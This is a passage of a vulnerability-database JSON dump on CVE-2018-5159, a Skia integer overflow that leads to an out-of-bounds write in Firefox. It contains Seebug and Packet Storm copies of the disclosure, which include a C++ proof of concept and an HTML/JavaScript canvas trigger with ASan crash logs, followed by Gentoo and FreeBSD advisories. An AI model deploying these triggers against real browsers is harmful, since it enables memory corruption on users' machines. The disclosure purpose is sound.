p.setAntiAlias(false);\r\n float intervals[] = { 0, 10e9f };\r\n p.setStyle(SkPaint::kStroke_Style);\r\n p.setPathEffect(SkDashPathEffect::Make(intervals, SK_ARRAY_COUNT(intervals), 0));\r\n\r\n SkPath path;\r\n \r\n unsigned quadraticarr[] = {13, 68, 258, 1053, 1323, 2608, 10018, 15668, 59838, 557493, 696873, 871098, 4153813, 15845608, 48357008, 118059138, 288230353, 360287948, 562949933, 703687423, 1099511613, 0};\r\n path.moveTo(0, 0);\r\n unsigned numpoints = 1;\r\n unsigned i = 1;\r\n unsigned qaindex = 0;\r\n while(numpoints < 2147483647) {\r\n if(numpoints == quadraticarr[qaindex]) {\r\n path.quadTo(i, 0, i, 0);\r\n qaindex++;\r\n numpoints += 2;\r\n } else {\r\n path.lineTo(i, 0);\r\n numpoints += 1;\r\n }\r\n i++;\r\n if(i == 1000000) {\r\n path.moveTo(0, 0);\r\n numpoints += 1;\r\n i = 1;\r\n }\r\n }\r\n\r\n printf(\"done building path\\n\");\r\n\r\n canvas.drawPath(path, p);\r\n\r\n return 0;\r\n}\r\n```\r\n\r\n### ASan output:\r\n```\r\nASAN:DEADLYSIGNAL\r\n=================================================================\r\n==39779==ERROR: AddressSanitizer: SEGV on unknown address 0x7fefc321c7d8 (pc 0x7ff2dac9cf66 bp 0x7ffcb5a46540 sp 0x7ffcb5a45cc8 T0)\r\n #0 0x7ff2dac9cf65 (/lib/x86_64-linux-gnu/libc.so.6+0x83f65)\r\n #1 0x7bb66c in __asan_memcpy (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x7bb66c)\r\n #2 0xcb2a33 in SkTDArray<SkPoint>::append(int, SkPoint const*) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../include/private/../private/SkTDArray.h:184:17\r\n #3 0xcb8b9a in SkPathMeasure::buildSegments() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:341:21\r\n #4 0xcbb5f4 in SkPathMeasure::getLength() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:513:9\r\n #5 0xcbb5f4 in SkPathMeasure::nextContour() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:688\r\n #6 0x1805c14 in SkDashPath::InternalFilter(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*, float const*, int, float, int, float, SkDashPath::StrokeRecApplication) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/utils/SkDashPath.cpp:482:14\r\n #7 0xe9cf60 in SkDashImpl::filterPath(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/effects/SkDashPathEffect.cpp:40:12\r\n #8 0xc8fbef in SkPaint::getFillPath(SkPath const&, SkPath*, SkRect const*, float) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPaint.cpp:1500:24\r\n #9 0xbdbc26 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:1120:18\r\n #10 0x169b16e in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.h:58:9\r\n #11 0x169b16e in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBitmapDevice.cpp:226\r\n #12 0xb748d1 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:2167:9\r\n #13 0xb6b01a in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:1757:5\r\n #14 0x8031dc in main /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../example/SkiaSDLExample.cpp:49:5\r\n #15 0x7ff2dac392b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)\r\n #16 0x733519 in _start (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x733519)\r\n```\r\n\r\nThe issue can also be triggered via the web in Mozilla Firefox\r\n\r\n### PoC for Mozilla Firefox on Linux \r\nI used Firefox ASan build from https://developer.mozilla.org/en-US/docs/Mozilla/Testing/Firefox_and_Address_Sanitizer\r\n\r\n```\r\n<canvas id=\"canvas\" width=\"64\" height=\"64\"></canvas>\r\n<br>\r\n<button onclick=\"go()\">go</button>\r\n<script>\r\nvar canvas = document.getElementById(\"canvas\");\r\nvar ctx = canvas.getContext(\"2d\");\r\n\r\nfunction go() {\r\n ctx.beginPath();\r\n\r\n ctx.mozImageSmoothingEnabled = false;\r\n ctx.webkitImageSmoothingEnabled = false;\r\n ctx.msImageSmoothingEnabled = false;\r\n ctx.imageSmoothingEnabled = false;\r\n\r\n linedasharr = [0, 1e+37];\r\n ctx.setLineDash(linedasharr);\r\n\r\n quadraticarr = [13, 68, 258, 1053, 1323, 2608, 10018, 15668, 59838, 557493, 696873, 871098, 4153813, 15845608, 48357008, 118059138, 288230353, 360287948, 562949933, 703687423, 1099511613];\r\n ctx.moveTo(0, 0);\r\n numpoints = 1;\r\n i = 1;\r\n qaindex = 0;\r\n while(numpoints < 2147483647) {\r\n if(numpoints == quadraticarr[qaindex]) {\r\n ctx.quadraticCurveTo(i, 0, i, 0);\r\n qaindex++;\r\n numpoints += 2;\r\n } else {\r\n ctx.lineTo(i, 0);\r\n numpoints += 1;\r\n }\r\n i++;\r\n if(i == 1000000) {\r\n ctx.moveTo(0, 0);\r\n numpoints += 1;\r\n i = 1;\r\n }\r\n }\r\n\r\n alert(\"done building path\");\r\n\r\n ctx.stroke();\r\n\r\n alert(\"exploit failed\");\r\n}\r\n\r\n</script>\r\n```\r\n\r\n### ASan output:\r\n```\r\nAddressSanitizer:DEADLYSIGNAL\r\n=================================================================\r\n==37732==ERROR: AddressSanitizer: SEGV on unknown address 0x7ff86d20e7d8 (pc 0x7ff7c1233701 bp 0x7fffd19dd5f0 sp 0x7fffd19dd420 T0)\r\n==37732==The signal is caused by a WRITE memory access.\r\n #0 0x7ff7c1233700 in append /builds/worker/workspace/build/src/gfx/skia/skia/include/core/../private/SkTDArray.h:184:17\r\n #1 0x7ff7c1233700 in SkPathMeasure::buildSegments() /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:342\r\n #2 0x7ff7c1235be1 in getLength /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:516:15\r\n #3 0x7ff7c1235be1 in SkPathMeasure::nextContour() /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:688\r\n #4 0x7ff7c112905e in SkDashPath::InternalFilter(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*, float const*, int, float, int, float, SkDashPath::StrokeRecApplication) /builds/worker/workspace/build/src/gfx/skia/skia/src/utils/SkDashPath.cpp:307:19\r\n #5 0x7ff7c0bf9ed0 in SkDashPathEffect::filterPath(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*) const /builds/worker/workspace/build/src/gfx/skia/skia/src/effects/SkDashPathEffect.cpp:40:12\r\n #6 0x7ff7c1210ed6 in SkPaint::getFillPath(SkPath const&, SkPath*, SkRect const*, float) const /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPaint.cpp:1969:37\r\n #7 0x7ff7c0ec9156 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkDraw.cpp:1141:25\r\n #8 0x7ff7c0b8de4b in drawPath /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkDraw.h:55:15\r\n #9 0x7ff7c0b8de4b in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkBitmapDevice.cpp:235\r\n #10 0x7ff7c0bbc691 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkCanvas.cpp:2227:23\r\n #11 0x7ff7b86965b4 in mozilla::gfx::DrawTargetSkia::Stroke(mozilla::gfx::Path const*, mozilla::gfx::Pattern const&, mozilla::gfx::StrokeOptions const&, mozilla::gfx::DrawOptions const&) /builds/worker/workspace/build/src/gfx/2d/DrawTargetSkia.cpp:829:12\r\n #12 0x7ff7bbd34dcc in mozilla::dom::CanvasRenderingContext2D::Stroke() /builds/worker/workspace/build/src/dom/canvas/CanvasRenderingContext2D.cpp:3562:11\r\n #13 0x7ff7ba9b0701 in mozilla::dom::CanvasRenderingContext2DBinding::stroke(JSContext*, JS::Handle<JSObject*>, mozilla::dom::CanvasRenderingContext2D*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CanvasRenderingContext2DBinding.cpp:3138:13\r\n #14 0x7ff7bbc3b4d1 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3031:13\r\n #15 0x7ff7c26ae3b8 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:290:15\r\n #16 0x7ff7c26ae3b8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:467\r\n #17 0x7ff7c28ecd17 in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jit/BaselineIC.cpp:2383:14\r\n #18 0x1a432b56061a (<unknown module>)\r\n```", "published": "2018-06-08T00:00:00", "type": "seebug", "title": "Skia and Firefox: Integer overflow in SkTDArray leading to out-of-bounds write(CVE-2018-5159)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-5159"], "modified": "2018-06-08T00:00:00", "id": "SSV:97332", "href": "https://www.seebug.org/vuldb/ssvid-97332", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": ""}], "gentoo": [{"lastseen": "2018-11-25T00:34:57", "bulletinFamily": "unix", "cvelist": ["CVE-2018-12379", "CVE-2018-12393", "CVE-2018-12360", "CVE-2018-12362", "CVE-2018-12359", "CVE-2018-5125", "CVE-2018-5144", "CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5129", "CVE-2018-5162", "CVE-2018-5146", "CVE-2018-5155", "CVE-2018-12391", "CVE-2018-5156", "CVE-2018-12361", "CVE-2018-5170", "CVE-2018-12378", "CVE-2018-5183", "CVE-2018-12383", "CVE-2018-12390", "CVE-2018-12371", "CVE-2018-12372", "CVE-2018-5188", "CVE-2018-12385", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-12392", "CVE-2018-12377", "CVE-2018-12374", "CVE-2017-16541", "CVE-2018-12366", "CVE-2018-12365", "CVE-2018-12363", "CVE-2018-12364", "CVE-2018-5168", "CVE-2018-12373", "CVE-2018-12376", "CVE-2018-12367", "CVE-2018-5145", "CVE-2018-12389", "CVE-2018-5187", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5127", "CVE-2018-5159"], "description": "### Background\n\nMozilla Thunderbird is a popular open-source email client from the Mozilla project. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Mozilla Thunderbird. Please review the referenced Mozilla Foundation Security Advisories and CVE identifiers below for details. \n\n### Impact\n\nA remote attacker may be able to execute arbitrary code, cause a Denial of Service condition, obtain sensitive information, or conduct Cross-Site Request Forgery (CSRF). \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Thunderbird users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-client/thunderbird-60.3.0\"\n \n\nAll Thunderbird binary users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=mail-client/thunderbird-bin-60.3.0\"", "edition": 1, "modified": "2018-11-24T00:00:00", "published": "2018-11-24T00:00:00", "id": "GLSA-201811-13", "href": "https://security.gentoo.org/glsa/201811-13", "title": "Mozilla Thunderbird: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2019-05-29T18:31:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-5173", "CVE-2018-5150", "CVE-2018-5169", "CVE-2018-5178", "CVE-2018-5180", "CVE-2018-5175", "CVE-2018-5155", "CVE-2018-5177", "CVE-2018-5176", "CVE-2018-5172", "CVE-2018-5183", "CVE-2018-5167", "CVE-2018-5166", "CVE-2018-5152", "CVE-2018-5165", "CVE-2018-5151", "CVE-2018-5160", "CVE-2018-5157", "CVE-2018-5182", "CVE-2018-5163", "CVE-2018-5154", "CVE-2018-5164", "CVE-2018-5153", "CVE-2018-5174", "CVE-2018-5181", "CVE-2018-5168", "CVE-2018-5158", "CVE-2018-5159"], "description": "\nMozilla Foundation reports:\n\nCVE-2018-5183: Backport critical security fixes in Skia\nCVE-2018-5154: Use-after-free with SVG animations and clip paths\nCVE-2018-5155: Use-after-free with SVG animations and text paths\nCVE-2018-5157: Same-origin bypass of PDF Viewer to view protected PDF files\nCVE-2018-5158: Malicious PDF can inject JavaScript into PDF Viewer\nCVE-2018-5159: Integer overflow and out-of-bounds write in Skia\nCVE-2018-5160: Uninitialized memory use by WebRTC encoder\nCVE-2018-5152: WebExtensions information leak through webRequest API\nCVE-2018-5153: Out-of-bounds read in mixed content websocket messages\nCVE-2018-5163: Replacing cached data in JavaScript Start-up Bytecode Cache\nCVE-2018-5164: CSP not applied to all multipart content sent with multipart/x-mixed-replace\nCVE-2018-5166: WebExtension host permission bypass through filterReponseData\nCVE-2018-5167: Improper linkification of chrome: and javascript: content in web console and JavaScript debugger\nCVE-2018-5168: Lightweight themes can be installed without user interaction\nCVE-2018-5169: Dragging and dropping link text onto home button can set home page to include chrome pages\nCVE-2018-5172: Pasted script from clipboard can run in the Live Bookmarks page or PDF viewer\nCVE-2018-5173: File name spoofing of Downloads panel with Unicode characters\nCVE-2018-5174: Windows Defender SmartScreen UI runs with less secure behavior for downloaded files in Windows 10 April 2018 Update\nCVE-2018-5175: Universal CSP bypass on sites using strict-dynamic in their policies\nCVE-2018-5176: JSON Viewer script injection\nCVE-2018-5177: Buffer overflow in XSLT during number formatting\nCVE-2018-5165: Checkbox for enabling Flash protected mode is inverted in 32-bit Firefox\nCVE-2018-5178: Buffer overflow during UTF-8 to Unicode string conversion through legacy extension\nCVE-2018-5180: heap-use-after-free in mozilla::WebGLContext::DrawElementsInstanced\nCVE-2018-5181: Local file can be displayed in noopener tab through drag and drop of hyperlink\nCVE-2018-5182: Local file can be displayed from hyperlink dragged and dropped on addressbar\nCVE-2018-5151: Memory safety bugs fixed in Firefox 60\nCVE-2018-5150: Memory safety bugs fixed in Firefox 60 and Firefox ESR 52.8\n\n", "edition": 6, "modified": "2018-05-09T00:00:00", "published": "2018-05-09T00:00:00", "id": "5AEFC41E-D304-4EC8-8C82-824F84F08244", "href": "https://vuxml.freebsd.org/freebsd/5aefc41e-d304-4ec8-8c82-824f84f08244.html", "title": "mozilla -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2018-05-25T01:38:49", "description": "", "published": "2018-05-24T00:00:00", "type": "packetstorm", "title": "Skia / Firefox SkTDArray Integer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-5159"], "modified": "2018-05-24T00:00:00", "id": "PACKETSTORM:147843", "href": "https://packetstormsecurity.com/files/147843/Skia-Firefox-SkTDArray-Integer-Overflow.html", "sourceData": "`Skia and Firefox: Integer overflow in SkTDArray leading to out-of-bounds write \n \nCVE-2018-5159 \n \n \nSkia bug report: <a href=\"https://bugs.chromium.org/p/skia/issues/detail?id=7674\" title=\"\" class=\"\" rel=\"nofollow\">https://bugs.chromium.org/p/skia/issues/detail?id=7674</a> \nMozilla bug report: <a href=\"https://bugzilla.mozilla.org/show_bug.cgi?id=1441941\" title=\"\" class=\"\" rel=\"nofollow\">https://bugzilla.mozilla.org/show_bug.cgi?id=1441941</a> \n \n \nIn Skia, SkTDArray stores length (fCount) and capacity (fReserve) as 32-bit ints and does not perform any integer overflow checks. There are a couple of places where an integer overflow could occur: \n \n(1) <a href=\"https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=369\" title=\"\" class=\"\" rel=\"nofollow\">https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=369</a> \n(2) <a href=\"https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=382\" title=\"\" class=\"\" rel=\"nofollow\">https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=382</a> \n(3) <a href=\"https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=383\" title=\"\" class=\"\" rel=\"nofollow\">https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=383</a> \n \nand possibly others \n \nIn addition, on 32-bit systems, multiplication integer overflows could occur in several places where expressions such as \n \nfReserve * sizeof(T) \nsizeof(T) * count \n \netc. are used. \n \nAn integer overflow in (2) above is especially dangerous as it will cause too little memory to be allocated to hold the array which will cause a out-of-bounds write when e.g. appending an element. \n \nI have successfully demonstrated the issue by causing an overflow in fPts array in SkPathMeasure (<a href=\"https://cs.chromium.org/chromium/src/third_party/skia/include/core/SkPathMeasure.h?l=104&rcl=23d97760248300b7aec213a36f8b0485857240b5\" title=\"\" class=\"\" rel=\"nofollow\">https://cs.chromium.org/chromium/src/third_party/skia/include/core/SkPathMeasure.h?l=104&rcl=23d97760248300b7aec213a36f8b0485857240b5</a>) which is used when rendering dashed paths. \n \nThe PoC requires a lot of memory (My estimate is 16+1 GB for storing the path, additional 16GB for the SkTDArray we are corrupting), however there might be less demanding paths for triggering SkTDArray integer overflows. \n \nPoC program for Skia \n \n================================================================= \n \n#include <stdio.h> \n \n#include \"SkCanvas.h\" \n#include \"SkPath.h\" \n#include \"SkGradientShader.h\" \n#include \"SkBitmap.h\" \n#include \"SkDashPathEffect.h\" \n \nint main (int argc, char * const argv[]) { \n \nSkBitmap bitmap; \nbitmap.allocN32Pixels(500, 500); \n \n//Create Canvas \nSkCanvas canvas(bitmap); \n \nSkPaint p; \np.setAntiAlias(false); \nfloat intervals[] = { 0, 10e9f }; \np.setStyle(SkPaint::kStroke_Style); \np.setPathEffect(SkDashPathEffect::Make(intervals, SK_ARRAY_COUNT(intervals), 0)); \n \nSkPath path; \n \nunsigned quadraticarr[] = {13, 68, 258, 1053, 1323, 2608, 10018, 15668, 59838, 557493, 696873, 871098, 4153813, 15845608, 48357008, 118059138, 288230353, 360287948, 562949933, 703687423, 1099511613, 0}; \npath.moveTo(0, 0); \nunsigned numpoints = 1; \nunsigned i = 1; \nunsigned qaindex = 0; \nwhile(numpoints < 2147483647) { \nif(numpoints == quadraticarr[qaindex]) { \npath.quadTo(i, 0, i, 0); \nqaindex++; \nnumpoints += 2; \n} else { \npath.lineTo(i, 0); \nnumpoints += 1; \n} \ni++; \nif(i == 1000000) { \npath.moveTo(0, 0); \nnumpoints += 1; \ni = 1; \n} \n} \n \nprintf(\"done building path\\n\"); \n \ncanvas.drawPath(path, p); \n \nreturn 0; \n} \n \n================================================================= \n \nASan output: \n \nASAN:DEADLYSIGNAL \n================================================================= \n==39779==ERROR: AddressSanitizer: SEGV on unknown address 0x7fefc321c7d8 (pc 0x7ff2dac9cf66 bp 0x7ffcb5a46540 sp 0x7ffcb5a45cc8 T0) \n#0 0x7ff2dac9cf65 (/lib/x86_64-linux-gnu/libc.so.6+0x83f65) \n#1 0x7bb66c in __asan_memcpy (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x7bb66c) \n#2 0xcb2a33 in SkTDArray<SkPoint>::append(int, SkPoint const*) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../include/private/../private/SkTDArray.h:184:17 \n#3 0xcb8b9a in SkPathMeasure::buildSegments() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:341:21 \n#4 0xcbb5f4 in SkPathMeasure::getLength() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:513:9 \n#5 0xcbb5f4 in SkPathMeasure::nextContour() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:688 \n#6 0x1805c14 in SkDashPath::InternalFilter(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*, float const*, int, float, int, float, SkDashPath::StrokeRecApplication) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/utils/SkDashPath.cpp:482:14 \n#7 0xe9cf60 in SkDashImpl::filterPath(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/effects/SkDashPathEffect.cpp:40:12 \n#8 0xc8fbef in SkPaint::getFillPath(SkPath const&, SkPath*, SkRect const*, float) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPaint.cpp:1500:24 \n#9 0xbdbc26 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:1120:18 \n#10 0x169b16e in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.h:58:9 \n#11 0x169b16e in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBitmapDevice.cpp:226 \n#12 0xb748d1 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:2167:9 \n#13 0xb6b01a in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:1757:5 \n#14 0x8031dc in main /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../example/SkiaSDLExample.cpp:49:5 \n#15 0x7ff2dac392b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0) \n#16 0x733519 in _start (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x733519) \n \nThe issue can also be triggered via the web in Mozilla Firefox \n \nPoC for Mozilla Firefox on Linux (I used Firefox ASan build from <a href=\"https://developer.mozilla.org/en-US/docs/Mozilla/Testing/Firefox_and_Address_Sanitizer\" title=\"\" class=\"\" rel=\"nofollow\">https://developer.mozilla.org/en-US/docs/Mozilla/Testing/Firefox_and_Address_Sanitizer</a>) \n \n================================================================= \n \n<canvas id=\"canvas\" width=\"64\" height=\"64\"></canvas> \n<br> \n<button onclick=\"go()\">go</button> \n<script> \nvar canvas = document.getElementById(\"canvas\"); \nvar ctx = canvas.getContext(\"2d\"); \n \nfunction go() { \nctx.beginPath(); \n \nctx.mozImageSmoothingEnabled = false; \nctx.webkitImageSmoothingEnabled = false; \nctx.msImageSmoothingEnabled = false; \nctx.imageSmoothingEnabled = false; \n \nlinedasharr = [0, 1e+37]; \nctx.setLineDash(linedasharr); \n \nquadraticarr = [13, 68, 258, 1053, 1323, 2608, 10018, 15668, 59838, 557493, 696873, 871098, 4153813, 15845608, 48357008, 118059138, 288230353, 360287948, 562949933, 703687423, 1099511613]; \nctx.moveTo(0, 0); \nnumpoints = 1; \ni = 1; \nqaindex = 0; \nwhile(numpoints < 2147483647) { \nif(numpoints == quadraticarr[qaindex]) { \nctx.quadraticCurveTo(i, 0, i, 0); \nqaindex++; \nnumpoints += 2; \n} else { \nctx.lineTo(i, 0); \nnumpoints += 1; \n} \ni++; \nif(i == 1000000) { \nctx.moveTo(0, 0); \nnumpoints += 1; \ni = 1; \n} \n} \n \nalert(\"done building path\"); \n \nctx.stroke(); \n \nalert(\"exploit failed\"); \n} \n \n</script> \n \n================================================================= \n \nASan output: \n \nAddressSanitizer:DEADLYSIGNAL \n================================================================= \n==37732==ERROR: AddressSanitizer: SEGV on unknown address 0x7ff86d20e7d8 (pc 0x7ff7c1233701 bp 0x7fffd19dd5f0 sp 0x7fffd19dd420 T0) \n==37732==The signal is caused by a WRITE memory access. \n#0 0x7ff7c1233700 in append /builds/worker/workspace/build/src/gfx/skia/skia/include/core/../private/SkTDArray.h:184:17 \n#1 0x7ff7c1233700 in SkPathMeasure::buildSegments() /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:342 \n#2 0x7ff7c1235be1 in getLength /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:516:15 \n#3 0x7ff7c1235be1 in SkPathMeasure::nextContour() /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:688 \n#4 0x7ff7c112905e in SkDashPath::InternalFilter(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*, float const*, int, float, int, float, SkDashPath::StrokeRecApplication) /builds/worker/workspace/build/src/gfx/skia/skia/src/utils/SkDashPath.cpp:307:19 \n#5 0x7ff7c0bf9ed0 in SkDashPathEffect::filterPath(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*) const /builds/worker/workspace/build/src/gfx/skia/skia/src/effects/SkDashPathEffect.cpp:40:12 \n#6 0x7ff7c1210ed6 in SkPaint::getFillPath(SkPath const&, SkPath*, SkRect const*, float) const /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPaint.cpp:1969:37 \n#7 0x7ff7c0ec9156 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkDraw.cpp:1141:25 \n#8 0x7ff7c0b8de4b in drawPath /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkDraw.h:55:15 \n#9 0x7ff7c0b8de4b in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkBitmapDevice.cpp:235 \n#10 0x7ff7c0bbc691 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkCanvas.cpp:2227:23 \n#11 0x7ff7b86965b4 in mozilla::gfx::DrawTargetSkia::Stroke(mozilla::gfx::Path const*, mozilla::gfx::Pattern const&, mozilla::gfx::StrokeOptions const&, mozilla::gfx::DrawOptions const&) /builds/worker/workspace/build/src/gfx/2d/DrawTargetSkia.cpp:829:12 \n#12 0x7ff7bbd34dcc in mozilla::dom::CanvasRenderingContext2D::Stroke() /builds/worker/workspace/build/src/dom/canvas/CanvasRenderingContext2D.cpp:3562:11 \n#13 0x7ff7ba9b0701 in mozilla::dom::CanvasRenderingContext2DBinding::stroke(JSContext*, JS::Handle<JSObject*>, mozilla::dom::CanvasRenderingContext2D*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CanvasRenderingContext2DBinding.cpp:3138:13 \n#14 0x7ff7bbc3b4d1 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3031:13 \n#15 0x7ff7c26ae3b8 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:290:15 \n#16 0x7ff7c26ae3b8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:467 \n#17 0x7ff7c28ecd17 in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jit/BaselineIC.cpp:2383:14 \n#18 0x1a432b56061a (<unknown module>) \n \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: ifratric \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/147843/GS20180524174411.txt"}], "exploitdb": [{"lastseen": "2018-05-25T18:07:40", "description": "Skia and Firefox - Integer Overflow in SkTDArray Leading to Out-of-Bounds Write. CVE-2018-5159. Dos exploit for Multiple platform. Tags: Out Of Bounds, Integ...", "published": "2018-05-25T00:00:00", "type": "exploitdb", "title": "Skia and Firefox - Integer Overflow in SkTDArray Leading to Out-of-Bounds Write", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-5159"], "modified": 